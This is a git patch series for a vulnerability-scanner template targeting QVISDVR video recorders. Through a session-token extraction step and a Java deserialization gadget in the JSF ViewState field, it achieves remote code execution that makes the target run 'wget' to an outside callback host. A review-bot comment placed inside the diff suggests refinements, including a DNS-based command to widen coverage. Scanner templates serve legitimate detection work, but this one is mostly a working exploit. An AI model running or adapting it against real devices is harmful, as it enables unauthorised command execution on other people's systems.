From 58a79ddf4a5e0c6faaa8d44b06d54f9b59c1e11a Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Mon, 12 Jul 2021 16:21:03 +0100 Subject: [PATCH 1/4] Create QVISDVR-Java-Deserialization --- iot/QVISDVR-Java-Deserialization | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 iot/QVISDVR-Java-Deserialization diff --git a/iot/QVISDVR-Java-Deserialization b/iot/QVISDVR-Java-Deserialization new file mode 100644 index 0000000000..a11811614a --- /dev/null +++ b/iot/QVISDVR-Java-Deserialization @@ -0,0 +1,18 @@ +id: qvisdvr-java-deserialization + +info: + name: QVISdvr Java Deserialization + author: me9187 + severity: critical + description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! + references: https://github.com/joaomatosf/jexboss + tags: rce + +requests: + - method: GET + path: + - "{{BaseURL}}/qvisdvr/" + matchers: + - type: word + words: + - "/qvisdvr/index.faces" From 020b7974e048797843c05cc1b3ad06c7550ca56e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 16:20:01 +0530 Subject: [PATCH 2/4] minor update --- ...DVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename iot/{QVISDVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} (100%) diff --git a/iot/QVISDVR-Java-Deserialization b/iot/qvisdvr-java-deserialization.yaml similarity index 100% rename from iot/QVISDVR-Java-Deserialization rename to iot/qvisdvr-java-deserialization.yaml From a3057a63ae5acf6917271b7b3e5394777b1ae465 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Sun, 18 Jul 2021 22:00:43 +0530 Subject: [PATCH 3/4] Added Deserialization POC --- iot/qvisdvr-deserialization-rce.yaml | 50 +++++++++++++++++++++++++++ iot/qvisdvr-java-deserialization.yaml | 18 ---------- 2 files changed, 50 insertions(+), 18 deletions(-) create mode 100644 iot/qvisdvr-deserialization-rce.yaml delete mode 100644 iot/qvisdvr-java-deserialization.yaml diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml new file mode 100644 index 0000000000..f8316e0d7d --- /dev/null +++ b/iot/qvisdvr-deserialization-rce.yaml 
@@ -0,0 +1,50 @@ +id: qvisdvr-deserialization-rce + +info: + author: me9187 + name: QVISDVR JSF Deserialization - Remote Code Execution + severity: critical + reference: https://twitter.com/Me9187/status/1414606876575162373 + tags: qvisdvr,rce,deserialization,jsf,iot + +requests: + - raw: + - | + GET /qvisdvr/ HTTP/1.1 + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 + Content-Type: application/x-www-form-urlencoded + - | + POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Accept-Encoding: gzip, deflate + Content-Length: 1884 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) + Content-Type: application/x-www-form-urlencoded + + javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}")}} + + extractors: + - type: regex + name: token + group: 1 + internal: true + part: header + regex: + - "JSESSIONID=(.*)" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: interactsh_protocol + words: + - http \ No newline at end of file diff --git a/iot/qvisdvr-java-deserialization.yaml b/iot/qvisdvr-java-deserialization.yaml deleted file mode 100644 index a11811614a..0000000000 --- a/iot/qvisdvr-java-deserialization.yaml +++ /dev/null 
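Review bot: The `token` extractor's regex `JSESSIONID=(.*)` is greedy over the whole header line, so when the session id arrives as a `Set-Cookie` header the capture will also swallow the trailing attributes (`; Path=/qvisdvr; HttpOnly` and so on) and the POST path `/qvisdvr/index.faces;jsessionid={{token}}` will carry that junk; bounding the capture with `JSESSIONID=([^;\s]+)` fixes this. The POST also hard-codes `Content-Length: 1884` while the body comes from `generate_java_gadget(...)` wrapping `{{interactsh-url}}`, whose length differs per run; nuclei normally recomputes the length for raw requests, but if this template is ever run with `unsafe: true` the stale value will truncate or corrupt the gadget, so the header is safest dropped. The `wget` command assumes the DVR ships that binary; since the match is on `interactsh_protocol` being `http`, a target without `wget` produces a false negative even when deserialization succeeds, which is worth a one-line comment such as `# requires wget on the target; a DNS-based command (e.g. nslookup) would widen coverage`.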
@@ -1,18 +0,0 @@ -id: qvisdvr-java-deserialization - -info: - name: QVISdvr Java Deserialization - author: me9187 - severity: critical - description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! - references: https://github.com/joaomatosf/jexboss - tags: rce - -requests: - - method: GET - path: - - "{{BaseURL}}/qvisdvr/" - matchers: - - type: word - words: - - "/qvisdvr/index.faces" From 718b8bfdd93b78673a48f19ac02241bdde728c47 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:02:30 +0530 Subject: [PATCH 4/4] Update qvisdvr-deserialization-rce.yaml --- iot/qvisdvr-deserialization-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml index f8316e0d7d..9d77efad68 100644 --- a/iot/qvisdvr-deserialization-rce.yaml +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -11,18 +11,18 @@ requests: - raw: - | GET /qvisdvr/ HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: application/x-www-form-urlencoded - | POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 1884 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded